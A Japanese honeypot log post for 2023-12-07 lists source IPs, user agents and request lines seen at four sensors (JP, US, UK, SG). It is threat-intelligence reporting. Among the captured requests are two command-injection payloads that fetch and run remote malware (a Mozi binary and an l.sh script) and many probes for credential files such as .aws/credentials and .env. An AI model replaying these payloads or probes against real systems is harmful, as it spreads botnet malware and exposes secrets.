2023/12/07 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/12/07分です。

特徴

共通

CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
/.awsへのスキャン行為

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
infrawatchによるスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
infrawatchによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：149 (前日比：-236)
US：総アクセス数：163 (前日比：12)
UK：総アクセス数：122 (前日比：56)
SG：総アクセス数：113 (前日比：-2167)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.249.201.7	United States
1	20.116.219.47	United States
1	20.199.84.220	United States
65	35.85.237.231	United States
19	35.178.204.138	United States
1	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.181.251	United States
1	64.62.197.108	United States
1	64.62.197.109	United States
1	64.62.197.113	United States
1	64.62.197.226	United States
1	85.132.252.35	Cyprus
15	101.32.192.203	Singapore
1	104.192.0.61	United States
1	104.236.68.76	United States
1	107.170.255.35	United States
1	122.96.31.137	China
4	135.125.217.54	France
3	135.125.246.110	France
7	135.125.246.189	France
1	138.68.224.69	United States
2	159.223.138.47	United States
1	162.243.136.32	United States
2	164.52.0.94	China
1	167.94.145.52	United States
1	172.104.11.46	United States
1	172.233.57.47	United States
8	185.254.196.173	Ukraine
1	185.254.196.186	Ukraine
1	195.140.227.163	Ukraine
2	198.235.24.161	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
21	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965W Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25`
88	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Python-urllib/3.10`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
18		`\x16\x03\x01`
1		``
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.project`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//.env`	HTTP/1.1
1	GET	`/PHPConf.php`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/admin/phpinfo.php`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/cms/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
2	GET	`/docker/.env`	HTTP/1.1
1	GET	`/enviroments/.env.production`	HTTP/1.1
1	GET	`/enviroments/.env`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/info/info.php`	HTTP/1.1
1	GET	`/info/phpinfo.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/information.php`	HTTP/1.1
1	GET	`/information`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/live_env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
2	GET	`/manager/html`	HTTP/1.1
1	GET	`/p.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpinformation`	HTTP/1.1
1	GET	`/phptest.php`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/scripts/phpinfo.php`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//102[.]33[.]65[.]176:36750/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/sources/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/testphpinfo.php`	HTTP/1.1
1	GET	`/testphpinfo`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/viewinfo.php`	HTTP/1.1
1	GET	`/webdav/info.php`	HTTP/1.1
1	GET	`/webdav/phpinfo.php`	HTTP/1.1
1	GET	`/webdav/phpinfo`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
15	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.130.153.80	United States
20	18.134.240.19	United States
2	31.7.58.42	Panama
3	45.33.80.243	United States
1	45.79.181.104	United States
2	45.79.181.179	United States
1	45.79.181.251	United States
1	45.227.254.48	Belize
1	52.80.126.145	China
10	54.37.79.75	France
1	54.223.58.116	China
1	54.229.197.238	United States
6	57.129.23.166	France
2	78.153.140.221	Russia
2	83.97.73.87	Germany
2	85.239.241.240	Czechia
10	90.151.171.106	Russia
10	90.151.171.108	Russia
7	95.214.235.169	Ukraine
1	107.170.208.23	United States
1	138.68.224.69	United States
1	139.59.101.104	Singapore
13	142.93.220.42	United States
13	147.182.210.54	United States
2	159.223.138.47	United States
2	167.71.217.57	United States
2	167.71.217.61	United States
2	167.94.146.57	United States
2	167.248.133.124	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
2	172.104.11.51	United States
4	184.105.247.252	United States
17	185.65.18.86	Russia
2	188.166.231.170	United States
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.223.85	United States
3	193.35.18.187	Bulgaria
1	197.231.197.11	South Africa
2	198.235.24.74	United States
2	205.210.31.158	United States
2	205.210.31.212	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
66	`-`
5	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
10	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
2	`Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1`
24	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
6	`Mozilla/5.0`
2	`curl/8.1.2`
1	`python-requests/2.25.1`
1	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01\x07\x01`
38		`\x16\x03\x01`
3		``
2	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
1	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
3	CONNECT	`fingerprints[.]bablosoft[.]com:443`	HTTP/1.1
3	CONNECT	`google[.]com:443`	HTTP/1.1
3	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
2	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
2	GET	`/bundle.js`	HTTP/1.1
4	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
1	GET	`/cgi-bin/luci`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/files/`	HTTP/1.1
2	GET	`/form.html`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/mbilling/`	HTTP/1.0
2	GET	`/password.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/systembc/password.php`	HTTP/1.1
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//34[.]68[.]118[.]83:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//34[.]68[.]118[.]83:80/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z73802194750Q1`	HTTP/1.1
3	GET	`http[:]//fingerprints[.]bablosoft[.]com/ip?Z73802194750Q1`	HTTP/1.1
3	GET	`http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.206.213	Russia
1	31.7.58.42	Panama
2	34.64.103.128	United States
2	34.65.155.49	United States
20	35.178.167.254	United States
2	35.187.249.110	United States
2	35.193.163.188	United States
2	35.242.236.214	United States
1	45.33.80.243	United States
2	45.79.181.104	United States
1	45.79.181.223	United States
8	54.36.115.221	France
8	54.37.79.75	France
2	64.62.197.40	United States
1	64.62.197.43	United States
1	65.49.1.78	United States
1	66.240.192.82	United States
2	78.153.140.221	Russia
2	83.97.73.87	Germany
8	95.214.235.169	Ukraine
2	106.75.175.47	China
1	107.170.230.26	United States
1	120.63.180.123	India
1	138.68.224.69	United States
1	139.59.101.104	Singapore
2	146.190.47.101	United States
14	147.78.103.111	Bulgaria
2	162.142.125.212	United States
2	167.94.138.35	United States
2	167.248.133.50	United States
2	167.248.133.124	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
1	172.104.11.46	United States
3	172.105.128.11	United States
1	172.105.128.13	United States
2	178.128.51.88	United States
3	185.134.22.149	United Kingdom
1	192.82.57.212	Malaysia
1	192.99.7.195	Canada
1	192.241.218.63	United States
1	194.165.16.76	Panama
1	197.231.197.11	South Africa
1	198.199.105.70	United States
2	205.210.31.16	United States
2	205.210.31.47	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
43	`-`
1	`Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 infrawatch/0.1`
2	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
1	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`SSH-2.0-libssh2_1.10.0`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x07\x01`
31		`\x16\x03\x01`
2		``
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Ep1v`	HTTP/1.1
1	GET	`/GWqN`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
3	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/mbilling/`	HTTP/1.0
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(cd%2Ftmp%3B%20wget%20http%3A%2F%2F194[.]180[.]48[.]100%2Fl.sh%3B%20chmod%20777%20l.sh%3B%20sh%20l%2Fsh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
5	HEAD	`/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
4	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.136.104.71	Australia
1	4.151.188.212	United States
1	5.196.102.78	France
1	31.7.58.42	Panama
1	34.253.192.54	United States
19	35.176.104.80	United States
3	43.140.195.253	China
1	43.158.217.52	Singapore
1	45.56.108.128	United States
2	45.79.128.205	United States
4	45.79.172.21	United States
1	45.79.181.251	United States
3	45.129.14.79	Romania
1	45.227.254.48	Belize
2	52.56.213.116	United States
7	54.37.79.75	France
7	57.129.23.166	France
1	61.147.21.49	China
1	64.225.16.53	United States
2	83.97.73.87	Germany
8	95.214.235.169	Ukraine
3	101.34.207.157	China
3	106.14.24.53	China
1	106.75.145.30	China
3	124.220.48.210	China
1	138.68.224.69	United States
2	146.190.47.101	United States
2	159.223.138.47	United States
4	162.142.125.216	United States
2	167.94.138.35	United States
2	172.104.11.4	United States
2	172.104.11.51	United States
1	172.105.128.13	United States
3	184.105.247.194	United States
1	184.105.247.252	United States
6	185.134.22.149	United Kingdom
1	192.82.57.212	Malaysia
1	192.155.90.118	United States
1	192.241.207.53	United States
1	192.241.219.58	United States
1	192.241.222.61	United States
2	198.235.24.171	United States
2	205.210.31.13	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
40	`-`
1	`Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)`
1	`Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 9; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
12	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
6	`Mozilla/5.0 infrawatch/0.1`
2	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
31		`\x16\x03\x01`
3		``
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{}}`
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
1	GET	`/.aws/config`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.aws/secret`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/Ep1v`	HTTP/1.1
2	GET	`/GWqN`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
2	GET	`/cluster/cluster/`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
4	GET	`/phpmyadmin/index.php`	HTTP/1.1
4	GET	`/phpmyadmin4.8.5/index.php`	HTTP/1.1
4	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/swagger`	HTTP/1.1
2	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/webui/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	PRI	`*`	HTTP/2.0